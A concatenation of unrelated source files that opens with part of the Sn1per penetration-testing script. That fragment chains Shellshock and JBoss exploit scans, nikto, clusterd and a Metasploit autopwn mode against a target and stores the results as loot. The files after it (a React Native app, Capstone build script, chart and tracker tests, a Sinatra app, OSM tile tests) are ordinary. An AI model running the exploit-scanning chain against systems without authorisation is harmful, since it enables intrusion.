echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
fi
cd $INSTALL_DIR
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port$PORT.txt
fi
if [ "$SHOCKER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt
fi
if [ "$JEXBOSS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
cd $INSTALL_DIR
fi
if [ $METASPLOIT_EXPLOIT = "1" ]; then
SSL="false"
source modes/web_autopwn.sh
fi
source modes/osint_stage_2.sh
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
if [ "$LOOT" = "1" ]; then
loot
fi
if [ "$SLACK_NOTIFICATIONS" == "1" ]; then
/usr/bin/python "$INSTALL_DIR/bin/slack.py" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
exit
fi |
<reponame>Lysandroc/topcriptocurrency<filename>src/components/CryptoCoins.js<gh_stars>0
import React from 'react';
import {StyleSheet, ScrollView, Text, Alert, View} from 'react-native';
import { connect } from 'react-redux';
import fetchCurrency from '../actions/fetchCurrency'
import CryptoCoinDetail from './CryptoCoinDetail';
import {Spinner, Header} from './common';
class CryptoCoins extends React.Component {
componentDidMount() {
this.props.fetchCurrency();
}
render() {
const {coins} = this.props;
if(coins.isFetching) {
return (
<View style={styles.container}>
<Spinner size="large"/>
</View>
);
}
return (
<ScrollView style={{backgroundColor:'#2a2a2a'}}>
<View style={styles.container}>
{this.renderDetail()}
</View>
</ScrollView>
);
}
renderDetail() {
const {coins} = this.props;
return coins.data.map((item,index) => <CryptoCoinDetail key={index} cryptoCurrencyCurrent={item}/>);
}
}
const styles = StyleSheet.create({
container: {
flex:1,
flexDirection: 'row',
flexWrap: 'wrap',
justifyContent: 'center',
paddingTop:10,
backgroundColor: '#2a2a2a',
},
})
const mapStateToProps = (state, ownProps) => {
return {
coins: state.coins,
}
}
export default connect(mapStateToProps, {fetchCurrency})(CryptoCoins) |
#!/usr/bin/env bash
# Capstone Disassembly Engine
# By Nguyen Anh Quynh <aquynh@gmail.com>, 2013-2014
# Note: to cross-compile "nix32" on Linux, package gcc-multilib is required.
# build iOS lib for all iDevices, or only specific device
function build_iOS {
IOS_SDK=`xcrun --sdk iphoneos --show-sdk-path`
IOS_CC=`xcrun --sdk iphoneos -f clang`
IOS_CFLAGS="-Os -Wimplicit -isysroot $IOS_SDK"
IOS_LDFLAGS="-isysroot $IOS_SDK"
if (( $# == 0 )); then
# build for all iDevices
IOS_ARCHS="armv7 armv7s arm64"
else
IOS_ARCHS="$1"
fi
CC="$IOS_CC" CFLAGS="$IOS_CFLAGS" LDFLAGS="$IOS_LDFLAGS" LIBARCHS="$IOS_ARCHS" ${MAKE}
}
# build Android lib for only one supported architecture
function build_android {
if [ -z "$NDK" ]; then
echo "ERROR! Please set \$NDK to point at your Android NDK directory."
exit 1
fi
HOSTOS=$(uname -s | tr 'LD' 'ld')
HOSTARCH=$(uname -m)
TARGARCH="$1"
shift
case "$TARGARCH" in
arm)
[ -n "$APILEVEL" ] || APILEVEL="android-14" # default to ICS
[ -n "$GCCVER" ] || GCCVER="4.8"
CROSS=arm-linux-androideabi-
;;
arm64)
[ -n "$APILEVEL" ] || APILEVEL="android-21" # first with arm64
[ -n "$GCCVER" ] || GCCVER="4.9"
CROSS=aarch64-linux-android-
;;
*)
echo "ERROR! Building for Android on $1 is not currently supported."
exit 1
;;
esac
TOOLCHAIN="$NDK/toolchains/$CROSS$GCCVER/prebuilt/$HOSTOS-$HOSTARCH"
PLATFORM="$NDK/platforms/$APILEVEL/arch-$TARGARCH"
CROSS="$TOOLCHAIN/bin/$CROSS" CFLAGS="--sysroot=$PLATFORM" LDFLAGS="--sysroot=$PLATFORM" ${MAKE} $*
}
function build {
if [ $(uname -s) = Darwin ]; then
export LIBARCHS="i386 x86_64"
fi
if [ -n "$CC" ]; then
${MAKE} CC="$CC" $*
else
${MAKE} $*
fi
}
function install {
# Mac OSX needs to find the right directory for pkgconfig
if [ "$(uname)" == "Darwin" ]; then
# we are going to install into /usr/local, so remove old installs under /usr
rm -rf /usr/lib/libcapstone.*
rm -rf /usr/include/capstone
# install into /usr/local
export PREFIX=/usr/local
# find the directory automatically, so we can support both Macport & Brew
PKGCFGDIR="$(pkg-config --variable pc_path pkg-config | cut -d ':' -f 1)"
# set PKGCFGDIR only in non-Brew environment & pkg-config is available
if [ "$HOMEBREW_CAPSTONE" != "1" ] && [ ${PKGCFGDIR}x != x ]; then
if [ ${CC}x != x ]; then
${MAKE} CC=$CC PKGCFGDIR=$PKGCFGDIR install
else
${MAKE} PKGCFGDIR=$PKGCFGDIR install
fi
else
if [ ${CC}x != x ]; then
${MAKE} CC=$CC install
else
${MAKE} install
fi
fi
else # not OSX
if test -d /usr/lib64; then
if [ -n "$CC" ]; then
${MAKE} LIBDIRARCH=lib64 CC="$CC" install
else
${MAKE} LIBDIRARCH=lib64 install
fi
else
if [ -n "$CC" ]; then
${MAKE} CC="$CC" install
else
${MAKE} install
fi
fi
fi
}
function uninstall {
# Mac OSX needs to find the right directory for pkgconfig
if [ "$(uname)" == "Darwin" ]; then
# find the directory automatically, so we can support both Macport & Brew
PKGCFGDIR="$(pkg-config --variable pc_path pkg-config | cut -d ':' -f 1)"
export PREFIX=/usr/local
if [ ${PKGCFGDIR}x != x ]; then
${MAKE} PKGCFGDIR=$PKGCFGDIR uninstall
else
${MAKE} uninstall
fi
else # not OSX
if test -d /usr/lib64; then
${MAKE} LIBDIRARCH=lib64 uninstall
else
${MAKE} uninstall
fi
fi
}
MAKE=make
if [ "$(uname)" == "SunOS" ]; then
export MAKE=gmake
export INSTALL_BIN=ginstall
export CC=gcc
fi
if [[ "$(uname)" == *BSD* ]]; then
export MAKE=gmake
export PREFIX=/usr/local
fi
TARGET="$1"
shift
case "$TARGET" in
"" ) build $*;;
"default" ) build $*;;
"debug" ) CAPSTONE_USE_SYS_DYN_MEM=yes CAPSTONE_STATIC=yes CFLAGS='-O0 -g -fsanitize=address' LDFLAGS='-fsanitize=address' build $*;;
"install" ) install;;
"uninstall" ) uninstall;;
"nix32" ) CFLAGS=-m32 LDFLAGS=-m32 build $*;;
"cross-win32" ) CROSS=i686-w64-mingw32- build $*;;
"cross-win64" ) CROSS=x86_64-w64-mingw32- build $*;;
"cygwin-mingw32" ) CROSS=i686-pc-mingw32- build $*;;
"cygwin-mingw64" ) CROSS=x86_64-w64-mingw32- build $*;;
"cross-android" ) build_android $*;;
"clang" ) CC=clang build $*;;
"gcc" ) CC=gcc build $*;;
"ios" ) build_iOS $*;;
"ios_armv7" ) build_iOS armv7 $*;;
"ios_armv7s" ) build_iOS armv7s $*;;
"ios_arm64" ) build_iOS arm64 $*;;
"osx-kernel" ) CAPSTONE_USE_SYS_DYN_MEM=yes CAPSTONE_HAS_OSXKERNEL=yes CAPSTONE_ARCHS=x86 CAPSTONE_SHARED=no CAPSTONE_BUILD_CORE_ONLY=yes build $*;;
* ) echo "Usage: make.sh [nix32|cross-win32|cross-win64|cygwin-mingw32|cygwin-mingw64|ios|ios_armv7|ios_armv7s|ios_arm64|cross-android arm|cross-android arm64|clang|gcc|install|uninstall]"; exit 1;;
esac
|
package com.github.mikephil.charting.test;
import com.github.mikephil.charting.data.*;
import com.github.mikephil.charting.highlight.Highlight;
import com.github.mikephil.charting.interfaces.datasets.IPieDataSet;
import org.junit.Test;
import java.util.ArrayList;
import java.util.List;
import static junit.framework.Assert.assertEquals;
import static junit.framework.Assert.assertNull;
import static org.junit.Assert.assertTrue;
public class PieDataTest {
@Test
// for coverage
public void testNullObjects(){
// create a DataSet of empty ArrayList
List<PieEntry> values1 = new ArrayList<>();
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
// Create another DataSet from copy of dataSet1, and clear it.
DataSet pieDataSet2 = pieDataSet1.copy();
pieDataSet2.clear();
pieDataSet2.calcMinMaxY(Float.MIN_VALUE, Float.MAX_VALUE);
assertEquals(-Float.MAX_VALUE,pieDataSet2.getYMax(), 0.01f);
// Add a null object to a PieDataSet
pieDataSet2.addEntry(null);
pieDataSet2.calcMinMax();
assertEquals(-Float.MAX_VALUE,pieDataSet2.getYMax(), 0.01f);
// Add a meaningful object to a PieDataSet
PieEntry pieEntry = new PieEntry(6);
assertEquals(6f,pieEntry.getValue());
pieDataSet2.addEntry(pieEntry);
pieDataSet2.calcMinMaxY(Float.MIN_VALUE, Float.MAX_VALUE);
assertEquals(6f,pieDataSet2.getYMax(), 0.01f);
// the DataSet in pieData1 is an empty List
PieData pieData1 = new PieData(pieDataSet1);
pieData1.calcMinMaxY(Float.MIN_VALUE, Float.MAX_VALUE);
IPieDataSet dataSet1 = pieData1.getDataSetByIndex(0);
assertEquals(-Float.MAX_VALUE, dataSet1.getYMax());
// Construct a pieData by passing nothing
try{
PieData pieData2 = new PieData();
pieData2.calcMinMaxY(Float.MIN_VALUE, Float.MAX_VALUE);
// since in its source code, getDataSetByIndex doesn't check
// whether the ArraryList is existing, it will always return
// ArrayList.get(0) without an exception
assertNull(pieData2.getDataSetByIndex(0));
} catch (IndexOutOfBoundsException e){
boolean thrown = true;
assertTrue(thrown);
}
}
@Test
public void testPositiveInvalidIndex(){
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(i*10)); // 0 10 20 30 40
values2.add(new PieEntry(i*3)); // 0 3 6 9 12
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
assertEquals(null, after_pieDataSet1);
}
@Test
public void testNegativeInvalidIndex(){
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(i*10)); // 0 10 20 30 40
values2.add(new PieEntry(i*3)); // 0 3 6 9 12
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(-1);
assertEquals(null, after_pieDataSet1);
}
@Test
public void testValidIndex(){
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(i*10)); // 0 10 20 30 40
values2.add(new PieEntry(i*3)); // 0 3 6 9 12
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
// testing getDataSet_1.1: maximum of Y
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(0);
assertEquals(40f,after_pieDataSet1.getYMax(), 0.01f);
}
@Test
public void testDifferentDataTypeInput(){
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry((int) i*10)); // 0 10 20 30 40 ->int
values2.add(new PieEntry((long) i*3)); // 0 3 6 9 12 ->long
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
// testing setDataSet_1
// testing getDataSet_1.1: maximum of Y
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
assertEquals(null, after_pieDataSet1);
if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
assertEquals(40f,after_pieDataSet1.getYMax(), 0.01f);
// testing getDataSet_1.2: minimum of Y
assertEquals(0f,after_pieDataSet1.getYMin(), 0.01f);
// testing getYValueSum()_1: 0+10+20+30+40
assertEquals(100f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_1
Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(40f, entry1.getY(), 0.01f);
// testing setDataSet_2
pieData.setDataSet(pieDataSet2);
// testing getDataSet_2.1: maximum of Y
IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
assertEquals(12f,after_pieDataSet2.getYMax(), 0.01f);
// testing getDataSet_2.2: minimum of Y
assertEquals(0f,after_pieDataSet2.getYMin(), 0.01f);
// testing getYValueSum()_2: 0+3+6+9+12
assertEquals(30f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_2
Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(12f, entry2.getY(), 0.01f);
}
@Test
public void testPositiveInputEntries(){
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(i*10)); // 0 10 20 30 40
values2.add(new PieEntry(i*3)); // 0 3 6 9 12
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
// testing setDataSet_1
// testing getDataSet_1.1: maximum of Y
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
assertEquals(null, after_pieDataSet1);
if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
assertEquals(40f,after_pieDataSet1.getYMax(), 0.01f);
// testing getDataSet_1.2: minimum of Y
assertEquals(0f,after_pieDataSet1.getYMin(), 0.01f);
// testing getYValueSum()_1: 0+10+20+30+40
assertEquals(100f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_1
Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(40f, entry1.getY(), 0.01f);
// testing setDataSet_2
pieData.setDataSet(pieDataSet2);
// testing getDataSet_2.1: maximum of Y
IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
assertEquals(12f,after_pieDataSet2.getYMax(), 0.01f);
// testing getDataSet_2.2: minimum of Y
assertEquals(0f,after_pieDataSet2.getYMin(), 0.01f);
// testing getYValueSum()_2: 0+3+6+9+12
assertEquals(30f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_2
Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(12f, entry2.getY(), 0.01f);
}
@Test
public void testAllTheSameInputEntries(){
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(2)); // 2 2 2 2 2
values2.add(new PieEntry(1)); // 1 1 1 1 1
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
// testing setDataSet_1
// testing getDataSet_1.1: maximum of Y
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
assertEquals(null, after_pieDataSet1);
if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
assertEquals(2f,after_pieDataSet1.getYMax(), 0.01f);
// testing getDataSet_1.2: minimum of Y
assertEquals(2f,after_pieDataSet1.getYMin(), 0.01f);
// testing getYValueSum()_1: 0+10+20+30+40
assertEquals(10f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_1
Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(2f, entry1.getY(), 0.01f);
// testing setDataSet_2
pieData.setDataSet(pieDataSet2);
// testing getDataSet_2.1: maximum of Y
IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
assertEquals(1f,after_pieDataSet2.getYMax(), 0.01f);
// testing getDataSet_2.2: minimum of Y
assertEquals(1f,after_pieDataSet2.getYMin(), 0.01f);
// testing getYValueSum()_2: 0+3+6+9+12
assertEquals(5f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_2
Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(1f, entry2.getY(), 0.01f);
}
@Test
public void testNegativeInputEntries(){
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(-i*10)); // 0 -10 -20 -30 -40
values2.add(new PieEntry(-i*3)); // 0 -3 -6 -9 -12
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
// testing setDataSet_1
// testing getDataSet_1.1: maximum of Y
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
assertEquals(null, after_pieDataSet1);
if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
assertEquals(0f,after_pieDataSet1.getYMax(), 0.01f);
// testing getDataSet_1.2: minimum of Y
assertEquals(-40f,after_pieDataSet1.getYMin(), 0.01f);
// testing getYValueSum()_1: 0+10+20+30+40
assertEquals(-100f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_1
Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(-40f, entry1.getY(), 0.01f);
// testing setDataSet_2
pieData.setDataSet(pieDataSet2);
// testing getDataSet_2.1: maximum of Y
IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
assertEquals(0f,after_pieDataSet2.getYMax(), 0.01f);
// testing getDataSet_2.2: minimum of Y
assertEquals(-12f,after_pieDataSet2.getYMin(), 0.01f);
// testing getYValueSum()_2: 0+3+6+9+12
assertEquals(-30f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_2
Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(-12f, entry2.getY(), 0.01f);
}
@Test
public void testMixedInputEntries(){
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(-i*10+20)); // 20 10 0 -10 -20
values2.add(new PieEntry(-i*3+6)); // 6 3 0 -3 -6
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
// testing setDataSet_1
// testing getDataSet_1.1: maximum of Y
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
assertEquals(null, after_pieDataSet1);
if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
assertEquals(20f,after_pieDataSet1.getYMax(), 0.01f);
// testing getDataSet_1.2: minimum of Y
assertEquals(-20f,after_pieDataSet1.getYMin(), 0.01f);
// testing getYValueSum()_1: 0+10+20+30+40
assertEquals(0, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_1
Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(-20f, entry1.getY(), 0.01f);
// testing setDataSet_2
pieData.setDataSet(pieDataSet2);
// testing getDataSet_2.1: maximum of Y
IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
assertEquals(6f,after_pieDataSet2.getYMax(), 0.01f);
// testing getDataSet_2.2: minimum of Y
assertEquals(-6f,after_pieDataSet2.getYMin(), 0.01f);
// testing getYValueSum()_2: 0+3+6+9+12
assertEquals(0f, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_2
Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(-6f, entry2.getY(), 0.01f);
}
@Test
public void testBoundaryInputEntries(){
// float.MAX_VALUE
// float.MIN_VALUE
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(Float.MAX_VALUE)); // Float.MAX_VALUE * 5
values2.add(new PieEntry(Float.MIN_VALUE)); // Float.MIN_VALUE * 5
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
// testing setDataSet_1
// testing getDataSet_1.1: maximum of Y
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
assertEquals(null, after_pieDataSet1);
if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
assertEquals(Float.MAX_VALUE,after_pieDataSet1.getYMax(), 0.01f);
// testing getDataSet_1.2: minimum of Y
assertEquals(Float.MAX_VALUE,after_pieDataSet1.getYMin(), 0.01f);
// // testing getYValueSum()_1: 0+10+20+30+40 FAILED
assertEquals(Float.MAX_VALUE, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_1
Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(Float.MAX_VALUE, entry1.getY(), 0.01f);
// testing setDataSet_2
pieData.setDataSet(pieDataSet2);
// testing getDataSet_2.1: maximum of Y
IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
assertEquals(Float.MIN_VALUE,after_pieDataSet2.getYMax(), 0.01f);
// testing getDataSet_2.2: minimum of Y
assertEquals(Float.MIN_VALUE,after_pieDataSet2.getYMin(), 0.01f);
// testing getYValueSum()_2: 0+3+6+9+12
assertEquals(Float.MIN_VALUE, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_2
Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(Float.MIN_VALUE, entry2.getY(), 0.01f);
}
@Test
public void testAllZeroInputEntries(){
// float.MAX_VALUE
// float.MIN_VALUE
// create a list of PieEntry
List<PieEntry> values1 = new ArrayList<>();
List<PieEntry> values2 = new ArrayList<>();
for(int i = 0; i < 5; i++){
values1.add(new PieEntry(0)); // 0 * 5
values2.add(new PieEntry(0)); // 0 * 5
}
PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
PieData pieData = new PieData(pieDataSet1);
// testing setDataSet_1
// testing getDataSet_1.1: maximum of Y
IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
assertEquals(null, after_pieDataSet1);
if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
assertEquals(0,after_pieDataSet1.getYMax(), 0.01f);
// testing getDataSet_1.2: minimum of Y
assertEquals(0,after_pieDataSet1.getYMin(), 0.01f);
// testing getYValueSum()_1: 0+10+20+30+40
assertEquals(0, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_1
Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(0, entry1.getY(), 0.01f);
// testing setDataSet_2
pieData.setDataSet(pieDataSet2);
// testing getDataSet_2.1: maximum of Y
IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
assertEquals(0,after_pieDataSet2.getYMax(), 0.01f);
// testing getDataSet_2.2: minimum of Y
assertEquals(0,after_pieDataSet2.getYMin(), 0.01f);
// testing getYValueSum()_2: 0+3+6+9+12
assertEquals(0, pieData.getYValueSum(), 0.01f);
// testing getEntryForHighlight()_2
Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
assertEquals(0, entry2.getY(), 0.01f);
}
}
|
package com.acgist.snail.net.torrent.tracker;
import org.junit.jupiter.api.Test;
import com.acgist.snail.context.TorrentContext;
import com.acgist.snail.context.exception.DownloadException;
import com.acgist.snail.context.exception.NetException;
import com.acgist.snail.pojo.session.TorrentSession;
import com.acgist.snail.utils.Performance;
public class HttpTrackerSessionTest extends Performance {
@Test
public void testAnnounce() throws DownloadException, NetException {
final String path = "E:/snail/902FFAA29EE632C8DC966ED9AB573409BA9A518E.torrent";
final TorrentSession torrentSession = TorrentContext.getInstance().newTorrentSession(path);
final HttpTrackerSession session = HttpTrackerSession.newInstance("http://5rt.tace.ru:60889/announce");
// final HttpTrackerSession session = HttpTrackerSession.newInstance("http://opentracker.acgnx.se/announce");
// final HttpTrackerSession session = HttpTrackerSession.newInstance("http://tracker3.itzmx.com:6961/announce");
session.started(1000, torrentSession);
// session.scrape(1000, session);
}
}
|
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/1024+0+512-SWS/model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/1024+0+512-SWS/512+512+512-shuffled-N-first-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function shuffle_remove_all_but_nouns_first_third_sixth --eval_function penultimate_sixth_eval |
require 'sinatra'
require 'mongoid'
# Connect to the MongoDB
Mongoid.load!("mongoid.yml")
# Fetch all documents from the `Posts` collection
get '/posts' do
@posts = Post.order(created_at: :desc).all
erb :index
end
# Show a single post based on the id
get '/posts/:id' do
@post = Post.find(params[:id].to_i)
erb :show
end
# Render the template
__END__
@@ layout
<html>
<head>
<title>My App</title>
</head>
<body>
<%= yield %>
</body>
</html>
@@ index
<ul>
<% @posts.each do |post| %>
<li><a href="/posts/<%= post.id %>"><%= post.title %></a></li>
<% end %>
</ul>
@@ show
<h1><%= @post.title %></h1>
<p><%= @post.body %></p> |
<gh_stars>1-10
import pytest
import os
import constants as c
import iosm
def area_coor():
# Define the area for test: Inaccessible Island in south Atlantic Ocean
lon_min = -12.707272
lon_max = -12.640879
lat_min = -37.322413
lat_max = -37.279825
return lon_min, lon_max, lat_min, lat_max
def area_tiles(zoom):
# Define tiles for test: Inaccessible Island in south Atlantic Ocean
(lon_min, lon_max, lat_min, lat_max) = area_coor()
min_xtile, min_ytile = iosm.deg2num(lat_max, lon_min, zoom)
max_xtile, max_ytile = iosm.deg2num(lat_min, lon_max, zoom)
return range(min_xtile, max_xtile + 1, 1),\
range(min_ytile, max_ytile + 1, 1)
@pytest.fixture(scope="session", autouse=True)
def remove_test_files():
# Remove test tiles if exists
for zoom in range(c.max_zoom + 1):
xtiles, ytiles = area_tiles(zoom)
for x in xtiles:
for y in ytiles:
tile_path = f'tiles/{zoom}/{x}/{y}.png'
if os.path.isfile(tile_path):
os.remove(tile_path)
def test_deg2num():
# This function was copied from OSM wiki, no expected fail
assert True
def test_num2deg():
# This function was copied from OSM wiki, no expected fail
assert True
def test_download_url_nominal():
xtiles, ytiles = area_tiles(c.max_zoom)
assert iosm._download_url(c.max_zoom, xtiles.start, ytiles.start)
def test_download_url_existing_tile():
# Try to download nominal tile
xtiles, ytiles = area_tiles(c.max_zoom)
assert iosm._download_url(c.max_zoom, xtiles.start, ytiles.start)
def test_download_url_wrong_tile():
fake_input = 12345689 # no tile for this value in zoom/x/y
assert not iosm._download_url(fake_input, fake_input, fake_input)
def test_download_tiles_by_deg():
# Total number of tiles can differ according to zoom level
my_zoom = 10
expected_tiles = {0: 1, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1, 6: 1, 7: 1, 8: 2,
9: 2, 10: 2, 11: 4, 12: 4, 13: 6, 14: 16}
total_tiles = sum(list(expected_tiles.values())[:my_zoom+1])
(lon_min, lon_max, lat_min, lat_max) = area_coor()
assert iosm.download_tiles_by_deg(lat_min, lon_min, lat_max, lon_max,
max_zoom=my_zoom) == total_tiles
def test_download_tiles_by_num():
my_zoom = 10
(lon_min, lon_max, lat_min, lat_max) = area_coor()
x_min, y_min = iosm.deg2num(lat_min, lon_min, my_zoom)
x_max, y_max = x_min + 2, y_min + 2 # limits are included
assert iosm.download_tiles_by_num(x_min, y_min, x_max, y_max,
max_zoom=my_zoom) == \
(x_max - x_min + 1) * (y_max - y_min + 1)
|
import {Link} from 'react-router';
import {RouteComponentProps} from 'react-router/lib/Router';
import {css} from '@emotion/core';
import PropTypes from 'prop-types';
import React from 'react';
